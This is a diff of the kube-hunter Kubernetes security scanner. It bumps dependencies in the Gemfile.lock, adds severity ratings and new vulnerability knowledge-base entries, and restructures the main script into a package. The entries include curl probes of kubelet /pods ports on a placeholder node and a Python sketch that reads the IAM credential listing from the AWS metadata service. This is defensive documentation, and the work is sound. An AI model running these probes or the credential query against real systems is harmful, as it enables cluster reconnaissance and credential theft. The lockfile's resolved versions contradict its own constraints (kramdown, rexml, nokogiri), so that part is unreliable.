+      kramdown-parser-gfm (= 1.1.0)
+      liquid (= 4.0.3)
      mercenary (~> 0.3)
-      minima (= 2.5.0)
+      minima (= 2.5.1)
      nokogiri (>= 1.10.4, < 2.0)
-      rouge (= 3.11.0)
+      rouge (= 3.23.0)
      terminal-table (~> 1.4)
     github-pages-health-check (1.16.1)
       addressable (~> 2.3)
@@ -81,27 +84,27 @@ GEM
       octokit (~> 4.0)
       public_suffix (~> 3.0)
       typhoeus (~> 1.3)
-    html-pipeline (2.12.0)
+    html-pipeline (2.14.0)
       activesupport (>= 2)
       nokogiri (>= 1.4)
     http_parser.rb (0.6.0)
     i18n (0.9.5)
       concurrent-ruby (~> 1.0)
-    jekyll (3.8.5)
+    jekyll (3.9.0)
       addressable (~> 2.4)
       colorator (~> 1.0)
       em-websocket (~> 0.5)
       i18n (~> 0.7)
       jekyll-sass-converter (~> 1.0)
       jekyll-watch (~> 2.0)
-      kramdown (~> 1.14)
+      kramdown (>= 1.17, < 3)
       liquid (~> 4.0)
       mercenary (~> 0.3.3)
       pathutil (~> 0.9)
       rouge (>= 1.7, < 4)
       safe_yaml (~> 1.0)
-    jekyll-avatar (0.6.0)
-      jekyll (~> 3.0)
+    jekyll-avatar (0.7.0)
+      jekyll (>= 3.0, < 5.0)
     jekyll-coffeescript (1.1.1)
       coffee-script (~> 2.2)
       coffee-script-source (~> 1.11.1)
@@ -114,36 +117,37 @@ GEM
       rouge (>= 2.0, < 4.0)
     jekyll-default-layout (0.1.4)
       jekyll (~> 3.0)
-    jekyll-feed (0.11.0)
-      jekyll (~> 3.3)
+    jekyll-feed (0.15.1)
+      jekyll (>= 3.7, < 5.0)
     jekyll-gist (1.5.0)
       octokit (~> 4.2)
-    jekyll-github-metadata (2.12.1)
-      jekyll (~> 3.4)
+    jekyll-github-metadata (2.13.0)
+      jekyll (>= 3.4, < 5.0)
       octokit (~> 4.0, != 4.4.0)
-    jekyll-mentions (1.4.1)
+    jekyll-mentions (1.6.0)
       html-pipeline (~> 2.3)
-      jekyll (~> 3.0)
-    jekyll-optional-front-matter (0.3.0)
-      jekyll (~> 3.0)
+      jekyll (>= 3.7, < 5.0)
+    jekyll-optional-front-matter (0.3.2)
+      jekyll (>= 3.0, < 5.0)
     jekyll-paginate (1.1.0)
-    jekyll-readme-index (0.2.0)
-      jekyll (~> 3.0)
-    jekyll-redirect-from (0.14.0)
-      jekyll (~> 3.3)
-    jekyll-relative-links (0.6.0)
-      jekyll (~> 3.3)
-    jekyll-remote-theme (0.4.0)
+    jekyll-readme-index (0.3.0)
+      jekyll (>= 3.0, < 5.0)
+    jekyll-redirect-from (0.16.0)
+      jekyll (>= 3.3, < 5.0)
+    jekyll-relative-links (0.6.1)
+      jekyll (>= 3.3, < 5.0)
+    jekyll-remote-theme (0.4.2)
       addressable (~> 2.0)
-      jekyll (~> 3.5)
-      rubyzip (>= 1.2.1, < 3.0)
+      jekyll (>= 3.5, < 5.0)
+      jekyll-sass-converter (>= 1.0, <= 3.0.0, != 2.0.0)
+      rubyzip (>= 1.3.0, < 3.0)
     jekyll-sass-converter (1.5.2)
       sass (~> 3.4)
-    jekyll-seo-tag (2.5.0)
-      jekyll (~> 3.3)
-    jekyll-sitemap (1.2.0)
-      jekyll (~> 3.3)
-    jekyll-swiss (0.4.0)
+    jekyll-seo-tag (2.6.1)
+      jekyll (>= 3.3, < 5.0)
+    jekyll-sitemap (1.4.0)
+      jekyll (>= 3.7, < 5.0)
+    jekyll-swiss (1.0.0)
     jekyll-theme-architect (0.1.1)
       jekyll (~> 3.5)
       jekyll-seo-tag (~> 2.0)
@@ -153,8 +157,8 @@ GEM
     jekyll-theme-dinky (0.1.1)
       jekyll (~> 3.5)
       jekyll-seo-tag (~> 2.0)
-    jekyll-theme-hacker (0.1.1)
-      jekyll (~> 3.5)
+    jekyll-theme-hacker (0.1.2)
+      jekyll (> 3.5, < 5.0)
       jekyll-seo-tag (~> 2.0)
     jekyll-theme-leap-day (0.1.1)
       jekyll (~> 3.5)
@@ -171,8 +175,8 @@ GEM
     jekyll-theme-modernist (0.1.1)
       jekyll (~> 3.5)
       jekyll-seo-tag (~> 2.0)
-    jekyll-theme-primer (0.5.3)
-      jekyll (~> 3.5)
+    jekyll-theme-primer (0.5.4)
+      jekyll (> 3.5, < 5.0)
      jekyll-github-metadata (~> 2.9)
      jekyll-seo-tag (~> 2.0)
     jekyll-theme-slate (0.1.1)
@@ -184,43 +188,49 @@ GEM
     jekyll-theme-time-machine (0.1.1)
       jekyll (~> 3.5)
       jekyll-seo-tag (~> 2.0)
-    jekyll-titles-from-headings (0.5.1)
-      jekyll (~> 3.3)
+    jekyll-titles-from-headings (0.5.3)
+      jekyll (>= 3.3, < 5.0)
     jekyll-watch (2.2.1)
       listen (~> 3.0)
-    jemoji (0.10.2)
+    jemoji (0.12.0)
       gemoji (~> 3.0)
       html-pipeline (~> 2.2)
-      jekyll (~> 3.0)
-    kramdown (1.17.0)
-    liquid (4.0.0)
-    listen (3.1.5)
-      rb-fsevent (~> 0.9, >= 0.9.4)
-      rb-inotify (~> 0.9, >= 0.9.7)
-      ruby_dep (~> 1.2)
+      jekyll (>= 3.0, < 5.0)
+    kramdown (2.3.0)
+      rexml (>= 3.2.5)
+    kramdown-parser-gfm (1.1.0)
+      kramdown (>= 2.3.1)
+    liquid (4.0.3)
+    listen (3.4.0)
+      rb-fsevent (~> 0.10, >= 0.10.3)
+      rb-inotify (~> 0.9, >= 0.9.10)
     mercenary (0.3.6)
-    mini_portile2 (2.4.0)
-    minima (2.5.0)
-      jekyll (~> 3.5)
+    mini_portile2 (2.5.0)
+    minima (2.5.1)
+      jekyll (>= 3.5, < 5.0)
       jekyll-feed (~> 0.9)
       jekyll-seo-tag (~> 2.1)
-    minitest (5.12.2)
+    minitest (5.14.3)
     multipart-post (2.1.1)
-    nokogiri (1.10.4)
-      mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    nokogiri (>= 1.11.4)
+      mini_portile2 (~> 2.5.0)
+      racc (~> 1.4)
+    octokit (4.20.0)
       faraday (>= 0.9)
       sawyer (~> 0.8.0, >= 0.5.3)
     pathutil (0.16.2)
       forwardable-extended (~> 2.6)
     public_suffix (3.1.1)
-    rb-fsevent (0.10.3)
-    rb-inotify (0.10.0)
+    racc (1.5.2)
+    rb-fsevent (0.10.4)
+    rb-inotify (0.10.1)
       ffi (~> 1.0)
-    rouge (3.11.0)
-    ruby-enum (0.7.2)
+    rexml (3.2.4)
+    rouge (3.23.0)
+    ruby-enum (0.8.0)
       i18n
-    ruby_dep (1.5.0)
-    rubyzip (2.0.0)
+    ruby2_keywords (0.0.2)
+    rubyzip (2.3.0)
     safe_yaml (1.0.5)
     sass (3.7.4)
       sass-listen (~> 4.0.0)
@@ -230,14 +240,20 @@ GEM
     sawyer (0.8.2)
       addressable (>= 2.3.5)
       faraday (> 0.8, < 2.0)
+    simpleidn (0.1.1)
+      unf (~> 0.1.4)
     terminal-table (1.8.0)
       unicode-display_width (~> 1.1, >= 1.1.1)
     thread_safe (0.3.6)
-    typhoeus (1.3.1)
+    typhoeus (1.4.0)
       ethon (>= 0.9.0)
-    tzinfo (1.2.5)
+    tzinfo (1.2.9)
       thread_safe (~> 0.1)
-    unicode-display_width (1.6.0)
+    unf (0.1.4)
+      unf_ext
+    unf_ext (0.0.7.7)
+    unicode-display_width (1.7.0)
+    zeitwerk (2.4.2)

 PLATFORMS
   ruby
@@ -247,4 +263,4 @@ DEPENDENCIES
   jekyll-sitemap

 BUNDLED WITH
-   1.17.2
+   2.2.5
_config.yml (GitHub Pages config)
@@ -1,6 +1,7 @@
 ---
 title: kube-hunter
 description: Kube-hunter hunts for security weaknesses in Kubernetes clusters
-logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/master/kube-hunter.png
+logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/main/kube-hunter.png
 show_downloads: false
 google_analytics: UA-63272154-1
 theme: jekyll-theme-minimal
@@ -10,7 +11,7 @@ collections:
 defaults:
   -
     scope:
      path: ""  # an empty string here means all files in the project
    values:
      layout: "default"
docs/_kb/KHV*.md: each knowledge-base entry gains a `severity` field in its front matter (one `@@ -2,6 +2,7 @@` hunk per file; the vid/title/categories lines and the `# {{ page.vid }} - {{ page.title }}` heading are unchanged context):

| VID    | Title                                                | Categories                                     | severity added |
|--------|------------------------------------------------------|------------------------------------------------|----------------|
| KHV002 | Kubernetes version disclosure                        | Information Disclosure                         | high     |
| KHV003 | Azure Metadata Exposure                              | Information Disclosure                         | high     |
| KHV004 | Azure SPN Exposure                                   | Identity Theft                                 | medium   |
| KHV005 | Access to Kubernetes API                             | Information Disclosure, Unauthenticated Access | high     |
| KHV006 | Insecure (HTTP) access to Kubernetes API             | Unauthenticated Access                         | high     |
| KHV007 | Specific Access to Kubernetes API                    | Access Risk                                    | high     |
| KHV020 | Possible Arp Spoof                                   | IdentityTheft                                  | high     |
| KHV021 | Certificate Includes Email Address                   | Information Disclosure                         | low      |
| KHV022 | Critical Privilege Escalation CVE                    | Privilege Escalation                           | critical |
| KHV023 | Denial of Service to Kubernetes API Server           | Denial Of Service                              | medium   |
| KHV024 | Possible Ping Flood Attack                           | Denial Of Service                              | medium   |
| KHV025 | Possible Reset Flood Attack                          | Denial Of Service                              | medium   |
| KHV026 | Arbitrary Access To Cluster Scoped Resources         | PrivilegeEscalation                            | high     |
| KHV027 | Kubectl Vulnerable To CVE-2019-11246                 | Remote Code Execution                          | medium   |
| KHV028 | Kubectl Vulnerable To CVE-2019-1002101               | Remote Code Execution                          | medium   |
| KHV029 | Dashboard Exposed                                    | Remote Code Execution                          | critical |
| KHV030 | Possible DNS Spoof                                   | Identity Theft                                 | high     |
| KHV031 | Etcd Remote Write Access Event                       | Remote Code Execution                          | critical |
| KHV032 | Etcd Remote Read Access Event                        | Access Risk                                    | critical |
| KHV033 | Etcd Remote version disclosure                       | Information Disclosure                         | medium   |
| KHV034 | Etcd is accessible using insecure connection (HTTP)  | Unauthenticated Access                         | high     |
| KHV036 | Anonymous Authentication                             | Remote Code Execution                          | high     |
| KHV037 | Exposed Container Logs                               | Information Disclosure                         | high     |
| KHV038 | Exposed Running Pods                                 | Information Disclosure                         | high     |
| KHV039 | Exposed Exec On Container                            | Remote Code Execution                          | high     |
| KHV040 | Exposed Run Inside Container                         | Remote Code Execution                          | high     |
| KHV041 | Exposed Port Forward                                 | Remote Code Execution                          | high     |
| KHV042 | Exposed Attaching To Container                       | Remote Code Execution                          | high     |
| KHV043 | Cluster Health Disclosure                            | Information Disclosure                         | low      |
| KHV044 | Privileged Container                                 | Access Risk                                    | high     |
| KHV045 | Exposed System Logs                                  | Information Disclosure                         | high     |
| KHV046 | Exposed Kubelet Cmdline                              | Information Disclosure                         | high     |
| KHV047 | Pod With Mount To /var/log                           | Privilege Escalation                           | high     |
| KHV049 | kubectl proxy Exposed                                | Information Disclosure                         | high     |
| KHV050 | Read access to Pod service account token             | Access Risk                                    | medium   |

Three entries also change body text:

docs/_kb/KHV003.md
@@ -12,7 +13,10 @@ Microsoft Azure provides an internal HTTP endpoint that exposes information from
 ## Remediation

 Consider using AAD Pod Identity. A Microsoft project that allows scoping the identity of workloads to Kubernetes Pods instead of VMs (instances).
+Starting in the 2020.10.15 Azure VHD Release, AKS restricts the pod CIDR access to that internal HTTP endpoint.
+
+[CVE-2021-27075](https://github.com/Azure/AKS/issues/2168)

 ## References

docs/_kb/KHV005.md
@@ -12,7 +13,7 @@ Kubernetes API was accessed with Pod Service Account or without Authentication (
 ## Remediation

-Secure acess to your Kubernetes API.
+Secure access to your Kubernetes API.

 It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least-privilege principle.

@@ -21,4 +22,4 @@ Consider opting out automatic mounting of SA token using `automountServiceAccoun
 ## References

 - [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)

docs/_kb/KHV029.md
@@ -12,4 +13,5 @@ An open Kubernetes Dashboard was detected. The Kubernetes Dashboard can be used
 ## Remediation

 Do not leave the Dashboard insecured.
docs/_kb/KHV051.md (new file, 41 lines)
@@ -0,0 +1,41 @@
---
vid: KHV051
title: Exposed Existing Privileged Containers Via Secure Kubelet Port
categories: [Access Risk]
severity: high
---

# {{ page.vid }} - {{ page.title }}

## Issue description

The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPS API. This may expose certain information and capabilities to an attacker with access to the kubelet API.

A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.

Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do far more damage in the cluster than expected: e.g. start/modify processes on the host.

## Remediation

Ensure the kubelet is protected using the `--anonymous-auth=false` kubelet flag. Allow only legitimate users using the `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.

Minimize the use of privileged containers.

Use Pod Security Policies to enforce a `privileged: false` policy.

Review the RBAC permissions to the Kubernetes API server for the anonymous and default service account, including bindings.

Ensure node(s) run active filesystem monitoring.

Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.

Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running.

## References

- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})
docs/_kb/KHV052.md (new file, 24 lines)
@@ -0,0 +1,24 @@
---
vid: KHV052
title: Exposed Pods
categories: [Information Disclosure]
severity: medium
---

# {{ page.vid }} - {{ page.title }}

## Issue description

An attacker could view sensitive information about pods that are bound to a Node using the exposed `/pods` endpoint.
This can be done either by accessing the read-only port (default 10255) or the secure kubelet port (10250).

## Remediation

Ensure the kubelet is protected using the `--anonymous-auth=false` kubelet flag. Allow only legitimate users using the `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.

Disable the read-only port by using the `--read-only-port=0` kubelet flag.

## References

- [Kubelet configuration](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
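A quick check for whether a node exposes the `/pods` endpoint described above; a sketch with a placeholder node address:

```bash
# Read-only kubelet port: answers with pod specs when left enabled
curl -s http://NODE_IP:10255/pods
# Secure kubelet port: answers anonymously only when misconfigured (-k skips TLS verification)
curl -sk https://NODE_IP:10250/pods
```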
25
docs/_kb/KHV053.md
Normal file
25
docs/_kb/KHV053.md
Normal file
@@ -0,0 +1,25 @@
|
||||
---
|
||||
vid: KHV053
|
||||
title: AWS Metadata Exposure
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
## Issue description
|
||||
|
||||
AWS EC2 provides an internal HTTP endpoint that exposes information from the cloud platform to workloads running in an instance. The endpoint is accessible to every workload running in the instance. An attacker that is able to execute a pod in the cluster may be able to query the metadata service and discover additional information about the environment.
|
||||
|
||||
## Remediation

* Limit access to the instance metadata service. Consider using a local firewall such as `iptables` to disable access from some or all processes/users to the instance metadata service.

* Disable the metadata service (via instance metadata options or IAM), or at a minimum enforce the use of IMDSv2 on the instance to require token-based access to the service (a sketch of the token flow follows this list).

* Modify the HTTP PUT response hop limit on the instance to 1. This allows access to the service only from the instance itself, not from within a pod.
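
The token flow that IMDSv2 enforces can be seen in a short sketch (the endpoints and headers are the standard AWS IMDS ones; this only responds when run from an EC2 instance):

```python
# Sketch of IMDSv2 token-based access. With the hop limit set to 1,
# the initial PUT already fails from inside a pod, blocking the exposure.
import requests

IMDS = "http://169.254.169.254"

# IMDSv2 requires fetching a session token first via HTTP PUT...
token = requests.put(
    f"{IMDS}/latest/api/token",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
    timeout=2,
).text

# ...and presenting it on every subsequent metadata request.
roles = requests.get(
    f"{IMDS}/latest/meta-data/iam/security-credentials/",
    headers={"X-aws-ec2-metadata-token": token},
    timeout=2,
)
print(roles.status_code, roles.text)
```
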
## References

- [AWS Instance Metadata service](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)
- [EC2 Instance Profiles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)
@@ -1,17 +0,0 @@
from os.path import basename
import glob


def get_py_files(path):
    for py_file in glob.glob("{}*.py".format(path)):
        if not py_file.endswith("__init__.py"):
            yield basename(py_file)[:-3]


def install_static_imports(path):
    with open("{}__init__.py".format(path), 'w') as init_f:
        for pf in get_py_files(path):
            init_f.write("from .{} import *\n".format(pf))

install_static_imports("src/modules/discovery/")
install_static_imports("src/modules/hunting/")
install_static_imports("src/modules/report/")
install_static_imports("plugins/")
13
job.yaml
@@ -1,14 +1,17 @@
---
apiVersion: batch/v1
kind: Job
metadata:
  name: kube-hunter
spec:
  template:
    metadata:
      labels:
        app: kube-hunter
    spec:
      containers:
        - name: kube-hunter
          image: aquasec/kube-hunter
          command: ["python", "kube-hunter.py"]
          args: ["--pod"]
        - name: kube-hunter
          image: aquasec/kube-hunter:0.6.8
          command: ["kube-hunter"]
          args: ["--pod"]
      restartPolicy: Never
  backoffLimit: 4
Binary file not shown.
Before: 144 KiB | After: 230 KiB
BIN
kube-hunter.png
Binary file not shown.
Before: 27 KiB | After: 25 KiB
149
kube-hunter.py
@@ -1,149 +0,0 @@
#!/usr/bin/env python3
import argparse
import logging
import threading


parser = argparse.ArgumentParser(description='Kube-Hunter - hunts for security weaknesses in Kubernetes clusters')
parser.add_argument('--list', action="store_true", help="displays all tests in kubehunter (add --active flag to see active tests)")
parser.add_argument('--interface', action="store_true", help="set hunting of all network interfaces")
parser.add_argument('--pod', action="store_true", help="set hunter as an insider pod")
parser.add_argument('--quick', action="store_true", help="Prefer quick scan (subnet 24)")
parser.add_argument('--include-patched-versions', action="store_true", help="Don't skip patched versions when scanning")
parser.add_argument('--cidr', type=str, help="set an ip range to scan, example: 192.168.0.0/16")
parser.add_argument('--mapping', action="store_true", help="outputs only a mapping of the cluster's nodes")
parser.add_argument('--remote', nargs='+', metavar="HOST", default=list(), help="one or more remote ip/dns to hunt")
parser.add_argument('--active', action="store_true", help="enables active hunting")
parser.add_argument('--log', type=str, metavar="LOGLEVEL", default='INFO', help="set log level, options are: debug, info, warn, none")
parser.add_argument('--report', type=str, default='plain', help="set report type, options are: plain, yaml, json")
parser.add_argument('--dispatch', type=str, default='stdout', help="where to send the report to, options are: stdout, http (set KUBEHUNTER_HTTP_DISPATCH_URL and KUBEHUNTER_HTTP_DISPATCH_METHOD environment variables to configure)")
parser.add_argument('--statistics', action="store_true", help="set hunting statistics")

import plugins

config = parser.parse_args()

try:
    loglevel = getattr(logging, config.log.upper())
except:
    pass
if config.log.lower() != "none":
    logging.basicConfig(level=loglevel, format='%(message)s', datefmt='%H:%M:%S')

from src.modules.report.plain import PlainReporter
from src.modules.report.yaml import YAMLReporter
from src.modules.report.json import JSONReporter
reporters = {
    'yaml': YAMLReporter,
    'json': JSONReporter,
    'plain': PlainReporter
}
if config.report.lower() in reporters.keys():
    config.reporter = reporters[config.report.lower()]()
else:
    logging.warning('Unknown reporter selected, using plain')
    config.reporter = reporters['plain']()

from src.modules.report.dispatchers import STDOUTDispatcher, HTTPDispatcher
dispatchers = {
    'stdout': STDOUTDispatcher,
    'http': HTTPDispatcher
}
if config.dispatch.lower() in dispatchers.keys():
    config.dispatcher = dispatchers[config.dispatch.lower()]()
else:
    logging.warning('Unknown dispatcher selected, using stdout')
    config.dispatcher = dispatchers['stdout']()

from src.core.events import handler
from src.core.events.types import HuntFinished, HuntStarted
from src.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
import src


def interactive_set_config():
    """Sets config manually, returns True for success"""
    options = [("Remote scanning", "scans one or more specific IPs or DNS names"),
               ("Interface scanning", "scans subnets on all local network interfaces"),
               ("IP range scanning", "scans a given IP range")]

    print("Choose one of the options below:")
    for i, (option, explanation) in enumerate(options):
        print("{}. {} ({})".format(i + 1, option.ljust(20), explanation))
    choice = input("Your choice: ")
    if choice == '1':
        config.remote = input("Remotes (separated by a ','): ").replace(' ', '').split(',')
    elif choice == '2':
        config.interface = True
    elif choice == '3':
        config.cidr = input("CIDR (example - 192.168.1.0/24): ").replace(' ', '')
    else:
        return False
    return True


def list_hunters():
    print("\nPassive Hunters:\n----------------")
    for hunter, docs in handler.passive_hunters.items():
        name, doc = hunter.parse_docs(docs)
        print("* {}\n {}\n".format(name, doc))

    if config.active:
        print("\n\nActive Hunters:\n---------------")
        for hunter, docs in handler.active_hunters.items():
            name, doc = hunter.parse_docs(docs)
            print("* {}\n {}\n".format(name, doc))


global hunt_started_lock
hunt_started_lock = threading.Lock()
hunt_started = False


def main():
    global hunt_started
    scan_options = [
        config.pod,
        config.cidr,
        config.remote,
        config.interface
    ]
    try:
        if config.list:
            list_hunters()
            return

        if not any(scan_options):
            if not interactive_set_config(): return

        with hunt_started_lock:
            hunt_started = True
        handler.publish_event(HuntStarted())
        if config.pod:
            handler.publish_event(RunningAsPodEvent())
        else:
            handler.publish_event(HostScanEvent())

        # Blocking to see discovery output
        handler.join()
    except KeyboardInterrupt:
        logging.debug("Kube-Hunter stopped by user")
    # happens when running a container without interactive option
    except EOFError:
        logging.error("\033[0;31mPlease run again with -it\033[0m")
    finally:
        hunt_started_lock.acquire()
        if hunt_started:
            hunt_started_lock.release()
            handler.publish_event(HuntFinished())
            handler.join()
            handler.free()
            logging.debug("Cleaned Queue")
        else:
            hunt_started_lock.release()


if __name__ == '__main__':
    main()
1
kube-hunter.py
Symbolic link
@@ -0,0 +1 @@
kube_hunter/__main__.py
@@ -5,9 +5,7 @@ First, let's go through kube-hunter's basic architecture.
### Directory Structure
~~~
kube-hunter/
    plugins/
        # your plugin
    src/
    kube_hunter/
        core/
        modules/
            discovery/
@@ -16,7 +14,7 @@ kube-hunter/
                # your module
            report/
                # your module
    kube-hunter.py
    __main__.py
~~~
### Design Pattern
Kube-hunter is built with the [Observer Pattern](https://en.wikipedia.org/wiki/Observer_pattern).
@@ -77,10 +75,10 @@ in order to prevent circular dependency bug.

Following the above example, let's figure out the imports:
```python
from ...core.types import Hunter
from ...core.events import handler
from kube_hunter.core.types import Hunter
from kube_hunter.core.events.event_handler import handler

from ...core.events.types import OpenPortEvent
from kube_hunter.core.events.types import OpenPortEvent

@handler.subscribe(OpenPortEvent, predicate=lambda event: event.port == 30000)
class KubeDashboardDiscovery(Hunter):
@@ -92,13 +90,13 @@ class KubeDashboardDiscovery(Hunter):
As you can see, all of the types here come from the `core` module.

### Core Imports
Relative import: `...core.events`
Absolute import: `kube_hunter.core.events`

|Name|Description|
|---|---|
|handler|Core object for using events, every module should import this object|

Relative import: `...core.events.types`
Absolute import: `kube_hunter.core.events.types`

|Name|Description|
|---|---|
@@ -106,7 +104,7 @@ relative import `...core.events.types`
|Vulnerability|Base class for defining a new vulnerability|
|OpenPortEvent|Published when a new port is discovered. The open port is assigned to the `port` attribute|

Relative import: `...core.types`
Absolute import: `kube_hunter.core.types`

|Type|Description|
|---|---|
@@ -192,7 +190,7 @@ To prove a vulnerability, create an `ActiveHunter` that is subscribed to the vul
A filter can change an event's attributes or remove it completely before it gets published to Hunters.

To create a filter (a complete sketch follows this list):
* create a class that inherits from `EventFilterBase` (from `src.core.events.types`)
* create a class that inherits from `EventFilterBase` (from `kube_hunter.core.events.types`)
* use `@handler.subscribe(Event)` to filter a specific `Event`
* define an `__init__(self, event)` method, and save the event in your class
* implement the `execute(self)` method, which __returns a new event, or None to remove the event__
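
For reference, a complete minimal sketch of such a filter (the class body is illustrative, not the repository's exact implementation):

```python
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Service, EventFilterBase


@handler.subscribe(Service)
class LocalHostFilter(EventFilterBase):
    """Drops services that were discovered on a localhost address."""

    def __init__(self, event):
        self.event = event

    def execute(self):
        # Returning None removes the event; returning self.event keeps it.
        if str(self.event.host) == "127.0.0.1":
            return None
        return self.event
```
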
@@ -206,10 +204,10 @@ To prevent an event from being published, return `None` from the execute method
To alter event attributes, return a new event based on `self.event` after your modifications; it will replace the original event before it is published.
__Make sure to return the event from the execute method, or the event will not get published__

For example, if you don't want to hunt services found on a localhost IP, you can create the following module in `src/modules/report/`
For example, if you don't want to hunt services found on a localhost IP, you can create the following module in `kube_hunter/modules/report/`
```python
from src.core.events import handler
from src.core.events.types import Service, EventFilterBase
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Service, EventFilterBase

@handler.subscribe(Service)
class LocalHostFilter(EventFilterBase):
@@ -224,9 +222,9 @@ That means other Hunters that are subscribed to this Service will not get trigge
That opens up a wide variety of possible operations: a filter can not only __filter out__ events, you can actually __change event attributes__, for example:

```python
from src.core.events import handler
from src.core.types import InformationDisclosure
from src.core.events.types import Vulnerability, EventFilterBase
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.types import InformationDisclosure
from kube_hunter.core.events.types import Vulnerability, EventFilterBase

@handler.subscribe(Vulnerability)
class CensorInformation(EventFilterBase):
@@ -247,5 +245,5 @@ __Note: In filters, you should not change attributes in the event.previous. This
Although we haven't been rigorous about this in the past, please add tests to support your code changes. Tests are executed like this:

```bash
python runtest.py
pytest
```
0
kube_hunter/__init__.py
Normal file
143
kube_hunter/__main__.py
Executable file
@@ -0,0 +1,143 @@
#!/usr/bin/env python3
# flake8: noqa: E402

from functools import partial
import logging
import threading

from kube_hunter.conf import Config, set_config
from kube_hunter.conf.parser import parse_args
from kube_hunter.conf.logging import setup_logger

from kube_hunter.plugins import initialize_plugin_manager

pm = initialize_plugin_manager()
# Using a plugin hook for adding arguments before parsing
args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
config = Config(
    active=args.active,
    cidr=args.cidr,
    include_patched_versions=args.include_patched_versions,
    interface=args.interface,
    log_file=args.log_file,
    mapping=args.mapping,
    network_timeout=args.network_timeout,
    num_worker_threads=args.num_worker_threads,
    pod=args.pod,
    quick=args.quick,
    remote=args.remote,
    statistics=args.statistics,
    k8s_auto_discover_nodes=args.k8s_auto_discover_nodes,
    service_account_token=args.service_account_token,
    kubeconfig=args.kubeconfig,
    enable_cve_hunting=args.enable_cve_hunting,
    custom=args.custom,
)
setup_logger(args.log, args.log_file)
set_config(config)

# Running all other registered plugins before execution
pm.hook.load_plugin(args=args)

from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import HuntFinished, HuntStarted
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
from kube_hunter.modules.report import get_reporter, get_dispatcher

logger = logging.getLogger(__name__)
config.dispatcher = get_dispatcher(args.dispatch)
config.reporter = get_reporter(args.report)


def interactive_set_config():
    """Sets config manually, returns True for success"""
    options = [
        ("Remote scanning", "scans one or more specific IPs or DNS names"),
        ("Interface scanning", "scans subnets on all local network interfaces"),
        ("IP range scanning", "scans a given IP range"),
    ]

    print("Choose one of the options below:")
    for i, (option, explanation) in enumerate(options):
        print("{}. {} ({})".format(i + 1, option.ljust(20), explanation))
    choice = input("Your choice: ")
    if choice == "1":
        config.remote = input("Remotes (separated by a ','): ").replace(" ", "").split(",")
    elif choice == "2":
        config.interface = True
    elif choice == "3":
        config.cidr = (
            input("CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): ")
            .replace(" ", "")
            .split(",")
        )
    else:
        return False
    return True


def list_hunters(class_names=False):
    print("\nPassive Hunters:\n----------------")
    for hunter, docs in handler.passive_hunters.items():
        name, doc = hunter.parse_docs(docs)
        if class_names:
            name = hunter.__name__
        print(f"* {name}\n {doc}\n")

    if config.active:
        print("\n\nActive Hunters:\n---------------")
        for hunter, docs in handler.active_hunters.items():
            name, doc = hunter.parse_docs(docs)
            if class_names:
                name = hunter.__name__
            print(f"* {name}\n {doc}\n")


hunt_started_lock = threading.Lock()
hunt_started = False


def main():
    global hunt_started
    scan_options = [config.pod, config.cidr, config.remote, config.interface, config.k8s_auto_discover_nodes]
    try:
        if args.list:
            if args.raw_hunter_names:
                list_hunters(class_names=True)
            else:
                list_hunters()
            return

        if not any(scan_options):
            if not interactive_set_config():
                return

        with hunt_started_lock:
            hunt_started = True
        handler.publish_event(HuntStarted())
        if config.pod:
            handler.publish_event(RunningAsPodEvent())
        else:
            handler.publish_event(HostScanEvent())

        # Blocking to see discovery output
        handler.join()
    except KeyboardInterrupt:
        logger.debug("Kube-Hunter stopped by user")
    # happens when running a container without interactive option
    except EOFError:
        logger.error("\033[0;31mPlease run again with -it\033[0m")
    finally:
        hunt_started_lock.acquire()
        if hunt_started:
            hunt_started_lock.release()
            handler.publish_event(HuntFinished())
            handler.join()
            handler.free()
            logger.debug("Cleaned Queue")
        else:
            hunt_started_lock.release()


if __name__ == "__main__":
    main()
66
kube_hunter/conf/__init__.py
Normal file
@@ -0,0 +1,66 @@
